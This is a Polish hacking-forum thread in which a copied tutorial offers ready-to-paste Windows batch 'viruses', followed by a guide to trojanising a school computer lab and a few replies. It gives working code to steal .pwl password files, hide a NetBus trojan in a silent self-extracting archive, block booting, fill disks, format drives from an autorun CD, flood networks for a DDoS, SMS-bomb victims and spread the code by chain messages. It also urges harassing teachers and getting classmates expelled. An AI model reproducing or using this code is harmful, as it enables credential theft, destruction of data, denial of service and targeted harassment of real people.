teraz skoro juz znasz podstawowe polecenia to teraz podam tylko przyklady wykorzystania : 1.do zdobycia hasel : hasla w windowsach 9x zapisane sa w plikach .pwl - wiec tworzymy plik .bat ktory bedze kopiowal pliki *.pwl
Kod:
@echo off // tak z przyzwyczajenia echo T | copy c:windows*.pwl a: // zalezy gdzie znajduja sie pliki *.pwl
wtedy bierzemy taki programik na dyskietce, podchodzimy do kompa ofiary i tylko wchodzimy na dyskietke, klikamy dwa razy i juz mam pliki z haslami na dyskietce :) - teraz tylko idziemy do domu i uzywajac jakiego programu do deszyfrowania zakodowanych tam hasel (np.pwlhack) wyciagamy badz lamiemy haselko i.. potem juz robisz se co chcesz 2.do usuniecia hasel - po prostu usuwamy pliki *.pwl (pamietajmy aby uzyc echo T | del lokalizacja\*.pwl) 3. zapomnialem jeszcze podac jednego triku z przeszmuglowaniem np. jakiegos trojana tak aby program antywirusowy sie nie skapowal (*juz raczej nie dziala) Wezmy za przyklad plik patch.exe z trojana (mozna go tak nazwac) o nazwie netbus (chyba kazdy poczatkujacy hacker mial z nim do czynienia)
zmieniamy nazwe tego pliku na np. readme.txt albo data.lib i wrzucamy do folderu. nastepnie tworzymy plik bat i wpisujemy w nim cos takiego:
i wrzucamy go do folderu. potem np. pakujemy rarem i wysylamy komus itp.
Jezeli juz mowa o win rarze to powiem, ze mozna stworzyc samorozpakowujace sie archiwum SFX. Po prostu dodajemy naszego batcha do archiwum, zaznaczajac w opcjach ze chcemy utworzyc archiwum SFX, nastepnie w zakladce "zaawansowane -> opcje SFX -> ogólne" wpisujemy folder docelowy, oraz jakie pliki chcemy uruchomic po rozpakowaniu, w naszym przypadku bedzie to nasz bat. Potem w opcjach SFX przechodzimy do zakladki "Tryby" w polu "Tryb cichy" zaznaczamy "ukryj wszystko", a w polu "Tryb Nadpisywnania" wybieramy "Nadpisz wszystkie pliki"
4.mozna jeszcze wykorzystywac jak to nazywaja - "nieudokumentowane funkcje windows" (win9x ) rundll32 user,disableoemlayer - zawiesza kompa rundll32 mouse,disable - nie dziala mysza rundll32 keyboard,disable - nie dziala klawiatura rundll32 User,ExitWindows - zamkniecie systemu rundll32 user,setcursorpos - przesuwa kursor w lewy gorny rog ekranu rundll32 krnl386,fatalexit - blad rundll32 rundll32 krnl386,switchstacko - program wykonal nieprawidlowa operacje rundll32 krnl386,exitkernel - zamyka windows - brutalnie, szybko rundll32 User,rapaintscreen - odswiezanie ekranu
jest jeszcze wiecej polecen ale te sa chyba najwazniejsze
5.jezeli chcesz komus usunac kosz z pulpitu musisz usunac z [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ex plorer\Desktop\ NameSpace\ klucz {645FF040-5081-101B-9F08-00AA002F954E} potem tylko jeszcze rundll32 User,rapaintscreen - i na oczach ofiary zniknie jej kosz.
Uwaga! dodanie linijki do rejestru z poziomu batcha wymaga nacisniecia przycisku "tak" wiec aby to ominac mozna zrobic skrypcik vbs (visual basic script )
Kod:
@echo off echo regcreate [sciezkarejestru] >> plik.vbs start plik.vbs
6.kolejna sztuczka (z zastosowanie skoku bezwarunkowego "goto" ) przyjrzyjmy sie teraz ponizszemu plikowi :P
Kod:
@echo off >> c:autoexec.bat :start >> c:autoexec.bat //zaznaczamy etykiete echo echo. >> c:autoexec.bat // echo. powoduje ze bedzie pusta linijka goto start >> c:autoexec.bat //i znowu idziemy do poczatku (:start) i znowu bedzie wykonywne polecenie echo. i potem znowu, i znowu i sie robi taka petla w nieskonczonosc.
a czemu zaproponowalem zeby zeby to wrzucic do autoexeca ? poniewaz gdy ofiara uruchomi komputer to bedzie jej sie robila ta petla w nieskonczonosc nic nie bedzie widac (echo.) wiec to bedzie wygladalo jakby sie komputer normalnie uruchamial - ale sie nigdy nie uruchomi
7.Jest jeszcze jedna przydatna rzecz - a mianowicie wyszukiwanie plikow - jezeli np. chemy znalezc plik o nazwie szukany.txt w danym katalogu to piszemy:
Kod:
if exist c:danykatalogszukany.txt goto znalazlem if not exist c:danykatalogszukany.txt goto nieznalazlem :znalazlem echo plik zostal znaleziony goto dalej :nieznalazlem echo plik nie zostal znaleziony exit :dalej echo dalszy ciag programu
8. przydaloby sie zeby nasz wirus sie rozprzestrzenial... albo sami powinnismy go rozprzetrzeniac. najprostszym sposobem jest wyslanie kilkudziesieciu maili strzelajac adresy . zeby sie nie meczyc mozna tez sobie sciagnac program do masowego wysylania maili - wtedy tylko wpisujesz adresy i nie musisz sie powtarzac. Mozna tez umiescic wirusa na stronie i napisac ze to jest wirus. wtedy napewno zjawia sie jakies osoby ktore beda chcialy zrobic komus glupi zart w ten sposob go rozprzestrzeniajac. mozna tez uzywac IRCa. ale to wszystko zajmuje troche czasu . wiec mozna sprobowac to jakos zautomatyzowac:
Wtedy delikwent ktory ma tak zawirusowany skrypcik po wejsciu na kanal bedzie wysylal kazdemu plik (jak wejdzie na #polska to ktos powinien dac sie wrobic). w ten sposob oczywiscie sie rozprzestrzeni. Ale jest problemik - w klientach mirca przewaznie zablokowane jest przyjmowane plikow bat exe itp. mozna sprobowac spakowac rarem/zipem.
9.Mozna zrobic tak ze kiedy ofiara uruchomi wirusa to ty otrzymasz sms`a na swoja komorke - ofiara musi miec GG. Wystarczy ze do wirusa dopiszesz linijke:
oczywiscie nie polecam tego ludziom ktorzy maja komorki na abonament - poniewaz gdyby ktos sie pokapowal to ze znalezieniem takiej osoby nie byloby problemu - chyba ze komus udalo sie zdobyc jakiegos anonima na falszywe nazwisko itp.
10.Jezeli chcesz aby ktos dostawal szalu to zrob taki plik i wrzuc do autostartu albo wczep kod do autoexec.bat
Kod:
@echo off :start start plik.bat goto start
11.Teraz zrobmy program-syfiarz
Kod:
@echo off regedit /e ksyf :start cls type ksyf >> c:windowssystem32syf.dll goto start
opis: regedit /e ksyf tak jakby odczytuje cala zawartosc zawartosc rejestru i kopiuje ja do pliku ksyf (w winXP cala tresc rejestru zajmuje 40 mb ), nastepnie zawartosc ksyf (40 mb) jest kopiowana do pliku syf.dll. I tak caly czas zawartosc pliku ksyf jest dopisywana do pliku syf.dll (petla) i co ok.3s ten plik powieksza sie o jakies 40 mb i tak w kolko . Po paru minutach moze zajac caly dysk (jezeli gosc ma maly dysk ). oczywiscie plik syf.dlli ksyf to moga byc dowolne nazwy plikow, jak gosc jest ciemny i chesz zrobic zeby sie nie skapowal to najlepiej nazwac ten plik jakos tak: sysdir.dll zeby myslal ze ten plik jest potrzebny.
12.Bez poczucia czasu ? :
Kod:
@echo off echo time 00:00 >> c:autoexec.bat echo cls >> c:autoexec.bat
Teraz przy kazdym uruchomieniu komputera ofiarze bedzie zmienial sie czas na 00:00. Oczywiscie moze to byc tez przydatne jak np. ktos chce zrobic sobie licznik ile czasu spedza przed komputerem :) Aha wiec dlatego najlepiej nie robic czasu 00:00 bo jak ofiara przypuszczalnie usiadla przed kompem o 19:00 (wiedzac ze jest 19:00) Zobaczyla ze jest czas 00:00, a potem spojrzala na zegarek zeby zobaczyc ktora jest godzina i zobaczyla 2:15 to bedzie wiedziala ze jest 21:15 (19:00 + 2:15=21:15 - dla ulomnych) a jak powiedzmy zmienimy czas na 16:37 to juz trudniej bedzie zapamietac ofiarze o ktorej usiadla (jezeli specjalnie nie zapamietala) i wtedy sie zamota. Ale tak wogole to przeciez ma w domu zegarek, a jak jest gdzie indziej to moze sama ma zegarek albo ktos inny itp. wiec to chyba tylko po to zeby kogos wkurzyc
13.Zapychacz wlasnych portow: Oczywiscie jest to takie tandetne ale moze sie przydac tworzymy kilka plikow (najlepiej z 6) bat oczywiscie i do kazdego wpisujemy
Kod:
@echo off :start telnet localhost:80 goto start
i jeszcze musimy zrobic plik start (niech te pliki nazywaja sie killer1.bat killer2.bat itd.)
Kod:
@echo off start killer1.bat start killer2.bat itd.
Ale po co robic tyle plikow ? zrobmy jeden plik ktory reszte zrobi za nas:
Mozna wyczaic kiedy ofiara bedzie sciagala jakis duzy plik ( to znaczy pogadac z nia i sie spytac czy nie ma albo czy nie bedzie sciagala jakis fajnych filmow czy cos..) I jak np. bedzie chciala sciagac w nocy to wrzucasz plik do hormonogramu i wtedy napewno nie sciagnie
Zamiast localhost mozna tez wpisac dowolny adres IP oraz dowolny port.
Jeszcze jedno - jezeli jestes polaczony siecia lokalna i chcesz komus zablokowac internet albo siec to mozna zrobic kilka takich plikow:
Kod:
@echo off :start ping -l 65500 -n 100 IP goto start
I wtedy zajmie mu cale pasmo transmisyjne ) i nie bedzie mu zialac siec ani net/
Mozesz jeszcze uniemozliwic ofiarze ircowanie (jezeli uzywa mirca). Robisz skrypt ktory po kazdym wejsciu na kanal robi ciagle ping na sobie, albo po prostu wysyla duza ilosc textu (flooduje) i wtedy server od razu wywala. Jak "dobrze" pojdzie to gosc moze miec K-LINE (zakaz laczenia sie z serverem(ami) irca)
Jezeli jestes wyjatkowo paskudny :)), a twoja ofiara laczy sie przez server dostawcy albo cos takiego to mozesz zrobic zeby pingowalo/telnetowalo ten server i wtedy dostawca moze zerwac umowe za "naruszenie bezpieczenstwa serwera" albo "probe uniemozliwienia dostepu do informacji innym uzytkownikom". A jezeli admin jest msciwy to moze nawet zadzwonic na policje. Wtedy powstanie niezle zamieszanie
Za pomoca batchy mozesz zrobic tez bombe do ataku DDoS. Czyli przejsc sie po kumplach z LANu zrobic u kazdego bomber ktory ma pingowac/telnetowac jakis serweri ustawic w hormonogramie odpowiednia godzine. Jezel masz w LANie sporo komputerow to serwer padnie :)) Jezeli mozesz sobie sam ustwiac IP internetowe to jeszcze mozesz zdjac z serwera firewall (to znaczy jezeli ma jakis syfowy )
14.Teraz mozemy zrobic takie swinstwo, i sprawdzic czy kolega jest uczciwy robimy tak:
1.Tworzymy taki plik do formatowania twardego dysku bez potwierdzenia 2.Tworzymy plik AUTORUN.INF : [AutoRun] open=plikformatujacy.bat 3.I te dwa pliki nagrywamy na CD
Teraz bierzemy taka plytke, i podpisujemy ja: "Scisle tajne, nie wolno tego CD uzywac. Trzymaj lapy z daleka"
Idziemy do kumpla. Gdy bedziemy wychodzili to "przez przypadek" zostawiamy u niego ten CD. Jezeli bedzie nieuczciwy i wscibski to po wlozeniu tej plyty sformatuje mu sie dysk.
15.Kolejny sposob sprawdzenia uczciwosci kolegi: Nagrywamy na plytke jakas gre czy film (oczywiscie nie wolno robic pirackich kopii i trzeba miec pozwolenie). Tylko ze w jakims folderze wczepiamy plik readme.txt o wpisujemy : "to jest CD ****" <-- nick lub imie Wychodzimy na osiedle i "przez przypadek" zostawiamy CD kiedy bedziemy szli do domu. I sobie patrzymy czy ktos tego nie wezmie. Jak ktos wezmie to wychodzimy i probujemy zrobic taka sytuacje: "O widze ze masz jakas plytke, co na niej jest". I teraz zalezy od goscia. Jezeli powie ze znalazl i ze chcial sie zapytac czyja jest to OK, ale jezeli powie ze to jego ze niedawno sobie nagral... To juz dalej robisz co chcesz (Ja Cie do przemocy nie namawiam )- najpierw oczywiscie pokazujesz mu ten plik readme.txt
16.SmS bomber za pomoca batcha i gadu gadu:
Kod:
@echo off :start c:progra~1gadu-gadugg.exe /send:"nr telefonu" /msg:"text" goto start
17. Jest jeszcze jeden ciekawy sposob na rozprzestrzenianie wirusa... poprzez GG. Tak sobie siedze i sie nudze..az tu nagle... Wyslij te wiadomosc do 10 osob a pokaze ci sie fajny filmik video...
A wiec:
@echo off kod wirusa cls
"Uwaga nowość! Wyslij te wiadomosc do 10 osob, nastepnie wklej kod powyzszego pliku(od @echo off do cls) do pliku *.bat (trzeba stworzyc nowy plik z koncowka bat np. foka.bat nastepnie edytuj itam wkleic zawartosc i zapisac ) to wtedy..." - i tutaj jakis kit wypisujesz. Tak samo mozesz tez zrobic przez poczte. :)))))) Jezeli 1 na 50 osob sie wrobi to i tak bedzie dobrze.
18.Skryptow mozna uzywac do obslugi innych programow. np. znana sztuczka z netcat'em:
w ten sposob po polaczeniu sie (telnetem, netcatem itp.) na port 1234 ofiary otrzymamy dostep do linii komend.
19.Nowy trick z wgetem ;).
Chodzi tu o pozbywanie sie stron na ktorych jest limit transferu (np. na republice 8| ). Po prostu jak nas jakas strona wnerwia to mozemy ja zamknac, zuzywajac transfer. Mozemy to zrobic tak: Sciagamy sobie program WGET i robimy batcha :
-r oznacza ze sciaga cala strone, a --delete-after od razu usuwa sciagniete pliki (przynajmniej nam nie bedzie zasmiecalo). Taki pliczek wklejamy do katalogu z wget`em i go uruchamiamy, zwijamy na pasek zadan i ze satysfakcja zajmujemy sie czym innym. Po pewnym czasie nie bedzie sie dalo wejsc na strone, przez najblizsza godzine. Tak pare razy i do konca miesiaca stronka bedzie zablokowana z powodu przekroczenia limitu transferu
PS. Do przekonwertowania pliku *.bat aby nie bylo widac jego kodu zrodlowego mozna uzyc programu bat2exec albo mozna takze pisac takiego wirusa przy uzyciu funkcji C ( system("polecenie batcha")
Zaznaczam że nie jestem autorem tego tekstu, skopiowałem to z innej strony.
Teraz Już jak umiecie zapisywać wirusa itp..To podam teraz tylko gotowe kody do wklejenia w notatnik
Zawieszenie kÂąputera
@echo off
rundll32 user,disableoemlayer
WyłÂączenie kÂąputera
@echo off
rundll32 krnl386.exe,exitkernel
WyłÂącz mysz
@echo off
rundll32 mouse,disable
WyłÂącz mysz i klawiature
@echo off
rundll32 mouse,disable
rundll32 keyboard,disable
Nie pozwalaj na Start Systemu
@echo off
echo :petla>>c:\autoexec.bat
echo goto petla>>c:\autoexec.bat
Spowolnij włÂączanie systemu oraz zamień przyciski myszy
@echo off
rundll32 user,swapmousebutton
echo dir /s /v c:\*.* >>c:autoexec.bat
Może to Was zainteresuje
Jak napisać wirusa w Notatniku krok po kroku
(*.bat)
Dzięki temu artykułowi napiszemy proste wirusy w Notatniku
Na poczÂątek pokaże jak zrobić bardzo prosty program który po otwarciu otworzy wpisanÂą strone www
Zaczynamy : Otwóż Notatnik i wklej , lub wpisz do niego poniższy kod:
Następnie zapisujemy w następujÂący sposób : klikamy na Plik potem klikamy na Zapisz jako... I teraz wpisujemy w nazwę (Nazwa pliku) program.bat , a poniżej z menu Zapisz jako typ wybieramy Wszystkie pliki i klikamy na Zapisz Teraz w miejscu gdzie zapisali my plik pokaże się nasz program klikamy na ikone naszego programu i powinna się otworzyć nam strona www.
Mam nadzieje że wszystko zrozumiałe Je li jednak nie to prosze o kontakt...
Jak wam sie nudzi i macie ochote to sprobojcie tego. Ja niezle zamieszanie zrobilem w szkole laugh.gif : A więc trzeba spełnić następujące warunki:
Po pierwsze należy się zorientować czy szkoła do której chodzimy ma w ogóle pracownie informatyczną. :-)
Po drugie gdy szkoła ma pracownie to należy sprawdzić czy komputery są połączone w sieć. Po trzecie sprawdzamy czy szkoła ma połączenie z netem (aby ściągać programy do hackowania, ale możemy je też przynosić na dyskietkach i CD'kach ale najlepiej je ściągnąć z netu).
Po czwarte sprawdzamy kto jest opiekunem pracowni, czy są inni "informatycy" (większość informatyków trzeba pisać w cudzysłowiu).
Dowiadujemy się kiedy odbywają się kółka (zajęcia pozalekcyjne, na których serfuje się po necie, poprawia z infy i robi inne takie tam). Jest jeszcze jeden warunek ale nie jest konieczny. Można znaleźć kumpla o podobnych zainteresowaniach (hackowanie), aby robić to wspólnie (zarażać pracownie serwerami koni trojańskich itp.), oraz po to że gdyby coś się nieudało było na kogo zwalić.
Gdy spełniamy następujące warunki możemy zacząć zabawę.
A więc do roboty:
Najpierw określamy się co chcemy zrobić (zarazić kompy trojanami, zdobyć kontrolę nad serwerem jeśli takowy jest)
Następnie kompletujemy oprogramowanie. Jeśli nie masz jeszcze doświadczenia w robieniu tak trudnych rzeczy. Zacznij od prostych trojanów (np. Prosiak). Na nich nabierzesz doświadczenia. Zakładam, że obywatel wie że trzeba umieć zdobyć IP'eki kompów w pracowni (o tym możesz przeczytać w dziale Hack).
Gdy mamy już IP komputerów i oprogramowanie potrzebne do zabawy to zaczynamy.
Najpierw infekujemy komputery serwerami trojanów. Dobrą myślą jest jeszcze założenie hasła na nie, aby inni nie mieli z nich pożytku. Powinniśmy zainfekować wszystkie komputery aby można było zaatakować każdego oraz dlatego że często serwery popularnych trojanów się dezaktywują i takiego komputera nie zaatakujemy (chyba że go zrestartujemy).
Gdy mamy władzę nad pracownią możemy zrobić kilka rzeczy: Sprawdzić kompetencje informatyków w szkole. Najlepiej jest mieć zarażony serwer (główny komputer). Gdy tak jest to Uruchamiamy trojana i łączymy się z jakimś komputerem najlepiej pierwszym. I robimy jazde. Kontrolujemy myszkę, wyłączamy klawiaturę, mrugamy monitorem. Następnie robimy tak z kolejnym losowo wybranym komputerem. Robimy tak do czasu gdy "informatyk" nie wpadnie w panikę. Robimy przerwę. Po chwili gdy mamy taką możliwość atakujemy serwer. Wtedy niedoświadczony "informatyk" lub lamer (można używać zamiennie) powinien kazać zrestartować komputery, wyjść z pracowni albo coś takiego. Na następnym kółku lub lekcji (gdy jest na nim jakaś znienawidzona osoba Robimy to co wcześniej z jednym komputerem i tej osobie wchodzimy na stronę hackerską, wtedy zawieszamy jej myszkę, klawiaturę, ogólnie komputer, tylko tak aby było widać tą stronę. Wtedy przy odrobinie szczęścia obywatel wyleci ze szkoły lub dostanie naganę. Działa dosyć dobrze, tylko trzeba uważać aby nie wpaść.
Gdy na przykład jesteśmy chorzy i w domu mamy Internet, a w pracowni jest lekcja możemy też zrobić niezłą jazde. Tylko trzeba najpierw będąc w pracowni sprawdzić zewnętrzne IP. Można to zrobić przez znalezienie strony na której jest księga gości w której zapisuje się numer IP. Wtedy zapisujemy się do takiej księgi (wpisujemy się będąc w pracowni) i mamy zewnętrzne IP. Takie IP może nie działać. Wtedy trzeba spróbować z czymś takim np. 213.76.114:21. Wytłumaczę wpisujemy numer IP zewnętrzny i po dwukropku ostatnie pole w IP wewnętrznego. Powinno działać. Wtedy gdy połączymy się z kimś możemy zacząć robić jazdę. Możemy wyzwać informatyka od ..... najgorszych :-). Możemy powyłączać kompy i nikt nas nie będzie podejrzewać chyba że skojarzy sobie że nas akurat nie ma w szkole wink.gif
Konie trojańskie w szkole to potężna broń przeciwko nie lubianym kolegom (i koleżankom hehe). Możemy nimi zrobić dużo więcej, ale wszystkiego tutaj nie opisałem.
POWODZENIA !!!
CI CO TO NAPISALI NIE SA TEGO AUTORAMI UKRADLI TO Z INNEJ STRONKI NIE PAMIETAM JUZ JAKIEJ ALE SIE DOWIEM ZAL MI WAS CIEZKO DOPISAC ZE TO JEST Z INNEJ STRONY 2 UZYTKOWNIKOW NAPISALO TYLKO ZE SCIAGLI TO Z INNEJ STRONKI
Stąd to wziąłes? http://www.look.pun.pl/bat-prosty-wirus-w-notatniku-763.htm ? bo widze ze nie napisales linku ;) pzdr
:mellow: a wie moze ktos jak napisac wirusa który wysle nam na poczte plik z kompa ofiary do którego znamy ścieżke. nie chodzi mi o żadne trojany tylko poprostu malutkiego wiruska w notatniku :mellow:
ja bym prosił jakiegoś moderatora zeby zamknął ten temat bo tutaj nie ma juz co do pisania bo wszystko jest wyjasnione, a wydaje mi sie ze poza mna i paroma osobami to nikt inny tego nie testowal i nawet nie wie jak to zrobic ;)